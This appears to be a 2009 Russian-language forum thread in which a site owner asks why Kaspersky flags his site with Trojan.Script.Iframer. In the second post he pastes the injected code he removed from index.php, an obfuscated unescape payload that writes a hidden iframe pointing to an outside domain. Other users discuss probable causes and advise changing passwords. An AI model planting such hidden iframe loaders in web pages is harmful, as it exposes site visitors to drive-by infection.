Войти

Показать полную графическую версию : [решено] Вирус на сайте. (с) Касперский

Artem-Samsung
26-02-2009, 13:22
Касперский обнаружил вирус на моем сайте О.о

The requested URL could not be retrieved

While trying to retrieve the URL:

http://djone.com.ua/

The following error was encountered:

The requested object is INFECTED with the following viruses: HEUR:Trojan.Script.Iframer


Please contact your service provider if you consider it incorrect.

Что теперь? Как он туда попал? Как вылечить?
От меня или хостера это зависит?
Artem-Samsung
26-02-2009, 13:42
Удалил кусок кода не понятно откуда взявшийся в файле index.php

<!--
document.write(unescape('%3C%49%46%52%41%4D%45%20%73%74%79%6C%65%3D%22%57%49%44%54%48%3A%20%30%25%3B %20%48%45%49%47%48%54%3A%20%30%70%78%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%69%67%6D%79%66%75% 63%6B%2E%63%6F%6D%2F%70%72%6E%2F%69%6E%64%65%78%2E%70%68%70%3F%74%3D%34%22%20%66%72%61%6D%65%42%6F%7 2%64%65%72%3D%30%20%73%63%72%6F%6C%6C%69%6E%67%3D%6E%6F%20%0A%0A%61%6C%6C%6F%77%54%72%61%6E%73%70%61 %72%65%6E%63%79%3E%3C%2F%49%46%52%41%4D%45%3E'));
//-->

И вроде норм.

Остается вопрос к обсуждению:

Вирусом файл был заражен из моего компьютера?
Или на сервере?

Написать письмо в сапорт.
Igor_I
26-02-2009, 19:21
Я даже и не в курсе, есть ли вирусы под Ubuntu.
Виноват скорее ты. Скрипты дырявые.
Artem-Samsung
27-02-2009, 02:06
Да, виноват я. Антивируса на винде не стояло, я так увлекся новой Windows 7 :((
Касперским полечил, файлы перезалил, вроде слава Богу все хорошо до вечера.
Sham
27-02-2009, 07:28
пароли меняй все
D.A.P
27-02-2009, 11:59
Скорее всего виноваты Вы сами
1. Поставили взломанный скрипт
2. Дали пароли к сайту другому человеку
3. Ваш комп заражен (С которого Вы заходили на админ панель)
4. Установили ломаный FTP менеджер (И пароли тютю)
Ваш хостер скорее не виноват хотя может быть
Адрес хостера дайте
Sham
27-02-2009, 16:51
Адрес хостера дайте »
низя
Igor_I
27-02-2009, 18:23
Скорее всего я не прав про скрипты, они не причем. А пароли меняй.
Artem-Samsung
27-02-2009, 23:02
Конечно поменял.
Очень нехорошо получилось, реально сам вирус подцепил и сайт пострадал, а может еще кто-то.
Воощем первый опыт пережитый на собственной шкуре в плане безопасности и вирусов.

Повезло, что винт и система были чистыми, и сменил пароли только на те сайты, которые заходил типа мейла и два сайтв в Тотал Коммандере

Сначала полечился от вирусов , а потом поисправлял зараженые файлы, которые были записаны на ФТП, теперь все ок.

<body>



© OSzone.net 2001-2012